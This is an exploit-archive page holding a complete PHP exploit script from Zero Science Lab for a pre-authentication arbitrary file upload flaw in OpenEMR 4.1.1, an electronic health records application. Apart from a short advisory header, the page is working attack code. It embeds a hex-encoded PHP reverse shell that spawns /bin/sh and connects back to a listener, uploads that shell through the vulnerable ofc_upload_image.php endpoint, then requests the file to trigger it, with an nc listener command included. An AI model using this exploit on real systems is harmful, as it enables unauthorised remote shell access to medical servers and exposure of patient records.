LATEST EXPLOITS
LIST CATEGORIES
LIST TYPES
LIST PORTS
LIST PLATFORMS
OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability
<?php
/*
OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability
Vendor: OpenEMR
Product web page: http://www.open-emr.org
Affected version: 4.1.1
Summary: OpenEMR is a Free and Open Source electronic health records and medical
practice management application that can run on Windows, Linux, Mac OS X, and many
other platforms.
Desc: The vulnerability is caused due to the improper verification of uploaded
files in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script
thru the 'name' parameter. This can be exploited to execute arbitrary PHP code
by uploading a malicious PHP script with multiple extensions.
================================================================================
/library/openflashchart/php-ofc-library/ofc_upload_image.php:
-------------------------------------------------------------
21: $default_path = '../tmp-upload-images/';
23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);
26: $destination = $default_path . basename( $_GET[ 'name' ] );
28: echo 'Saving your image to: '. $destination;
39: $jfh = fopen($destination, 'w') or die("can't open file");
40: fwrite($jfh, $HTTP_RAW_POST_DATA);
41: fclose($jfh);
46: exit();
================================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Fedora Linux
Apache2, PHP 5.4 MySQL 5.5
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5126
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php
09.02.2013
*/
error_reporting ( 0 );
set_time_limit ( 0 );
$go = "\033[0;92m" ; $no = "\033[0;37m" ;
echo $no ;
$host = $argv [ 1 ];
$sock = fsockopen ( $host , 80 , $errno , $errstr , 30 );
if(! $sock )
{
echo "\n> $errstr ( $errno )\n" ;
die();
}
function r_shell ( $sc )
{
for( $z = 0 ; $z < strlen ( $sc ); $z += 2 )
$exec .= chr ( hexdec ( substr ( $sc , $z , 2 )));
return $exec ;
}
print "\n+--------------------------------------------------------+" ;
print "\n+ +" ;
print "\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth) +" ;
print "\n+ +" ;
print "\n+ ID: ZSL-2013-5126 +" ;
print "\n+ +" ;
print "\n+ Copyleft (c) 2013, Zero Science Lab +" ;
print "\n+ +" ;
print "\n+--------------------------------------------------------+\n\n" ;
// PoC for Linux
// Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234
if ( $argc < 2 )
{
print "\n> Usage: php $argv [ 0 ] <target>\n\n" ;
die();
}
$pl = r_shell ( "3c3f7068700d0a" . "7365745f74696d" . "655f6c696d6974" .
"202830293b0d0a" . "246970203d2027" . "3132372e302e30" .
"2e31273b0d0a24" . "706f7274203d20" . "313233343b0d0a" .
"246368756e6b5f" . "73697a65203d20" . "313430303b0d0a" .
"2477726974655f" . "61203d206e756c" . "6c3b2024657272" .
"6f725f61203d20" . "6e756c6c3b0d0a" . "247368656c6c20" .
"3d2027756e616d" . "65202d613b2077" . "3b2069643b202f" .
"62696e2f736820" . "2d69273b0d0a24" .
"6461656d6f6e20" . "3d20303b202464" .
"65627567203d20" . "303b0d0a696620" .
"2866756e637469" . "6f6e5f65786973" .
"7473282770636e" . "746c5f666f726b" .
"272929207b0d0a" . "24706964203d20" .
"70636e746c5f66" . "6f726b28293b0d" .
"0a696620282470" . "6964203d3d202d" . "3129207b0d0a70" .
"72696e74697428" . "224552524f523a" . "2043616e277420" .
"666f726b22293b" . "20657869742831" . "293b7d0d0a6966" .
"20282470696429" . "207b6578697428" . "30293b7d0d0a69" .
"662028706f7369" . "785f7365747369" . "642829203d3d20" .
"2d3129207b0d0a" . "7072696e746974" . "28224572726f72" .
"3a2043616e2774" . "20736574736964" . "282922293b2065" .
"7869742831293b" . "7d0d0a24646165" .
"6d6f6e203d2031" . "3b7d20656c7365" .
"207b0d0a707269" . "6e746974282257" .
"41524e494e473a" . "204661696c6564" .
"20746f20646165" . "6d6f6e6973652e" .
"20205468697320" . "69732071756974" .
"6520636f6d6d6f" . "6e20616e64206e" .
"6f742066617461" . "6c2e22293b7d0d" . "0a636864697228" .
"222f22293b2075" . "6d61736b283029" . "3b0d0a24736f63" .
"6b203d2066736f" . "636b6f70656e28" . "2469702c202470" .
"6f72742c202465" . "72726e6f2c2024" . "6572727374722c" .
"203330293b0d0a" . "69662028212473" . "6f636b29207b0d" .
"0a7072696e7469" . "74282224657272" . "73747220282465" .
"72726e6f292229" . "3b206578697428" . "31293b7d0d0a24" .
"64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270" .
"697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d" .
"0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d" .
"2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470" .
"69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d" .
"0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d" .
"0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573" .
"5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31" .
"5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c" .
"2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a" .
"7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073" .
"68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620" .
"2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c" .
"20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620" .
"2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053" .
"68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472" .
"6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573" .
"5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73" .
"656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c" .
"6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a" .
"6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e" .
"707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028" .
"24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269" .
"7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928" .
"2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072" .
"696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428" .
"2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920" .
"7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f" .
"636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c" .
"2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444" .
"455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c" .
"20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253" .
"54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574" .
"293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d" .
"293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b" .
"325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20" .
"7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070" .
"72696e74202224737472696e675c6e223b7d7d0d0a3f3e" ); //PHP Reverse Shell, PTMNKY.
echo "\n> Writing reverse shell file" ;
$pckt = "POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\r\n" ;
$pckt .= "Host: { $host } \r\n" ;
$pckt .= "Content-Length: " . strlen ( $pl ). "\r\n\r\n { $pl } " ;
fputs ( $sock , $pckt );
sleep ( 2 );
print " ...." ; echo $go . "[OK]" ; echo $no ;
echo "\n> Calling your listener" ;
$pckt = "GET /openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\r\n" ;
$pckt .= "Host: { $host } \r\n" ;
$pckt .= "Connection: Keep-Alive\r\n\r\n" ;
fputs ( $sock , $pckt );
sleep ( 2 );
print " ........." ; echo $go . "[OK]" ; echo $no . "\n" ;
// interact_sh();
echo "\n> Enjoy!\n\n" ;
?>